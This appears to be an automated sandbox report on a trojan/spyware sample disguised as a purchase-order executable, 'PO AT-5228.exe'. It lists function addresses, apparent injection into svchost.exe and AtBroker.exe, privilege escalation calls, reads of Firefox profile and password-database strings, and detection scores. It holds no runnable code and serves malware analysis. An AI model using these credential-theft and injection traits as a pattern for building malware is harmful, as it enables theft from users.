                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B8123A0_2_00B8123A
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B9724D0_2_00B9724D
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B693F00_2_00B693F0
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA13CA0_2_00BA13CA
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B7F5630_2_00B7F563
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B696C00_2_00B696C0
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BAB6CC0_2_00BAB6CC
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B677B00_2_00B677B0
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BCF7FF0_2_00BCF7FF
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B979C90_2_00B979C9
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B7FA570_2_00B7FA57
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B69B600_2_00B69B60
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B67D190_2_00B67D19
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B89ED00_2_00B89ED0
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B7FE6F0_2_00B7FE6F
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B67FA30_2_00B67FA3
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_01960CA00_2_01960CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004589831_2_00458983
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0046F0731_2_0046F073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004428101_2_00442810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004430F01_2_004430F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004410A01_2_004410A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004502431_2_00450243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004412101_2_00441210
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004422F01_2_004422F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00456BD31_2_00456BD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00442C641_2_00442C64
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004504631_2_00450463
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00442C701_2_00442C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004424C01_2_004424C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004424D91_2_004424D9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0044E4E31_2_0044E4E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004424B81_2_004424B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC02C01_2_02EC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE02741_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E3F01_2_02E4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F003E61_2_02F003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFA3521_2_02EFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED20001_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF81CC1_2_02EF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF41A21_2_02EF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F001AA1_2_02F001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC81581_2_02EC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E301001_2_02E30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA1181_2_02EDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5C6E01_2_02E5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3C7C01_2_02E3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E407701_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E647501_2_02E64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEE4F61_2_02EEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF24461_2_02EF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE44201_2_02EE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F005911_2_02F00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E405351_2_02E40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3EA801_2_02E3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF6BD71_2_02EF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFAB401_2_02EFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E8F01_2_02E6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E268B81_2_02E268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4A8401_2_02E4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E428401_2_02E42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A01_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0A9A61_2_02F0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E569621_2_02E56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFEEDB1_2_02EFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52E901_2_02E52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFCE931_2_02EFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40E591_2_02E40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFEE261_2_02EFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E32FC81_2_02E32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBEFA01_2_02EBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB4F401_2_02EB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E82F281_2_02E82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E60F301_2_02E60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE2F301_2_02EE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30CF21_2_02E30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0CB51_2_02EE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40C001_2_02E40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3ADE01_2_02E3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E58DBF1_2_02E58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4AD001_2_02E4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDCD1F1_2_02EDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE12ED1_2_02EE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5D2F01_2_02E5D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5B2C01_2_02E5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E452A01_2_02E452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E8739A1_2_02E8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2D34C1_2_02E2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF132D1_2_02EF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF70E91_2_02EF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFF0E01_2_02EFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEF0CC1_2_02EEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E470C01_2_02E470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4B1B01_2_02E4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7516C1_2_02E7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2F1721_2_02E2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0B16B1_2_02F0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF16CC1_2_02EF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E856301_2_02E85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFF7B01_2_02EFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E314601_2_02E31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFF43F1_2_02EFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F095C31_2_02F095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDD5B01_2_02EDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF75711_2_02EF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEDAC61_2_02EEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDDAAC1_2_02EDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E85AA01_2_02E85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE1AA31_2_02EE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB3A6C1_2_02EB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFA491_2_02EFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF7A461_2_02EF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB5BF01_2_02EB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7DBF91_2_02E7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5FB801_2_02E5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFB761_2_02EFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E438E01_2_02E438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAD8001_2_02EAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E499501_2_02E49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5B9501_2_02E5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED59101_2_02ED5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E49EB01_2_02E49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E03FD21_2_02E03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E03FD51_2_02E03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFFB11_2_02EFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E41F921_2_02E41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFF091_2_02EFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFCF21_2_02EFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB9C321_2_02EB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5FDC01_2_02E5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF7D731_2_02EF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E43D401_2_02E43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF1D5A1_2_02EF1D5A
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052B9FD82_2_052B9FD8
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052D06C82_2_052D06C8
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052B18982_2_052B1898
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052AFB382_2_052AFB38
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052B82282_2_052B8228
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052B1AB82_2_052B1AB8
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046724463_2_04672446
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046644203_2_04664420
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0466E4F63_2_0466E4F6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C05353_2_045C0535
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046805913_2_04680591
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045DC6E03_2_045DC6E0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045E47503_2_045E4750
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C07703_2_045C0770
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045BC7C03_2_045BC7C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046520003_2_04652000
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046481583_2_04648158
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045B01003_2_045B0100
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0465A1183_2_0465A118
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046781CC3_2_046781CC
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046801AA3_2_046801AA
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046741A23_2_046741A2
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046602743_2_04660274
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046402C03_2_046402C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467A3523_2_0467A352
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046803E63_2_046803E6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045CE3F03_2_045CE3F0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C0C003_2_045C0C00
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045B0CF23_2_045B0CF2
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04660CB53_2_04660CB5
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045CAD003_2_045CAD00
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0465CD1F3_2_0465CD1F
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045BADE03_2_045BADE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045D8DBF3_2_045D8DBF
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C0E593_2_045C0E59
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467EE263_2_0467EE26
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467EEDB3_2_0467EEDB
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045D2E903_2_045D2E90
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467CE933_2_0467CE93
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04634F403_2_04634F40
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04602F283_2_04602F28
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04662F303_2_04662F30
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045E0F303_2_045E0F30
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045B2FC83_2_045B2FC8
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0463EFA03_2_0463EFA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045CA8403_2_045CA840
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C28403_2_045C2840
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045EE8F03_2_045EE8F0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045A68B83_2_045A68B8
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045D69623_2_045D6962
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0468A9A63_2_0468A9A6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C29A03_2_045C29A0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045BEA803_2_045BEA80
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467AB403_2_0467AB40
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04676BD73_2_04676BD7
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045B14603_2_045B1460
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467F43F3_2_0467F43F
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046775713_2_04677571
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046895C33_2_046895C3
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0465D5B03_2_0465D5B0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046056303_2_04605630
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046716CC3_2_046716CC
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467F7B03_2_0467F7B0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467F0E03_2_0467F0E0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046770E93_2_046770E9
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C70C03_2_045C70C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0466F0CC3_2_0466F0CC
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0468B16B3_2_0468B16B
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045AF1723_2_045AF172
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F516C3_2_045F516C
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045CB1B03_2_045CB1B0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046612ED3_2_046612ED
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045DB2C03_2_045DB2C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045DD2F03_2_045DD2F0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C52A03_2_045C52A0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045AD34C3_2_045AD34C
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467132D3_2_0467132D
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0460739A3_2_0460739A
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04639C323_2_04639C32
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467FCF23_2_0467FCF2
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04677D733_2_04677D73
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C3D403_2_045C3D40
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04671D5A3_2_04671D5A
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045DFDC03_2_045DFDC0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C9EB03_2_045C9EB0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467FF093_2_0467FF09
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04583FD23_2_04583FD2
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04583FD53_2_04583FD5
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C1F923_2_045C1F92
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467FFB13_2_0467FFB1
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0462D8003_2_0462D800
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C38E03_2_045C38E0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C99503_2_045C9950
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045DB9503_2_045DB950
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046559103_2_04655910
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04633A6C3_2_04633A6C
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04677A463_2_04677A46
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467FA493_2_0467FA49
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0466DAC63_2_0466DAC6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04605AA03_2_04605AA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04661AA33_2_04661AA3
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0465DAAC3_2_0465DAAC
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467FB763_2_0467FB76
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04635BF03_2_04635BF0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045FDBF93_2_045FDBF9
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045DFB803_2_045DFB80
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004F1FA03_2_004F1FA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004ECEB03_2_004ECEB0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004ED0D03_2_004ED0D0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004EB1503_2_004EB150
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004F55F03_2_004F55F0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004F38403_2_004F3840
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0050BCE03_2_0050BCE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0431E4933_2_0431E493
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_043102813_2_04310281
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0431E3773_2_0431E377
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0431E82C3_2_0431E82C
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0431D8F83_2_0431D8F8
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0431CB983_2_0431CB98
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 0463F290 appears 103 times
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 045AB970 appears 262 times
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 04607E54 appears 107 times
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 045F5130 appears 58 times
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: String function: 0462EA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02E75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02E2B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02EAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02E87E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02EBF290 appears 103 times
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: String function: 00B7EC2F appears 68 times
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: String function: 00B8F8A0 appears 35 times
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: String function: 00B86AC0 appears 42 times
                Source: PO AT-5228.exe, 00000000.00000003.1684313313.00000000042F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO AT-5228.exe
                Source: PO AT-5228.exe, 00000000.00000003.1686489245.000000000449D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO AT-5228.exe
                Source: PO AT-5228.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@14/10
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BACE7A GetLastError,FormatMessageW,0_2_00BACE7A
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B9AB84 AdjustTokenPrivileges,CloseHandle,0_2_00B9AB84
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B9B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B9B134
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BAE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00BAE1FD
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00BA6532
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BBC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00BBC18C
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B6406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00B6406B
                Source: C:\Users\user\Desktop\PO AT-5228.exeFile created: C:\Users\user\AppData\Local\Temp\autC0A9.tmpJump to behavior
                Source: PO AT-5228.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000891000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.2010047529.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3524603774.00000000008B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO AT-5228.exeReversingLabs: Detection: 34%
                Source: PO AT-5228.exeVirustotal: Detection: 27%
                Source: unknownProcess created: C:\Users\user\Desktop\PO AT-5228.exe "C:\Users\user\Desktop\PO AT-5228.exe"
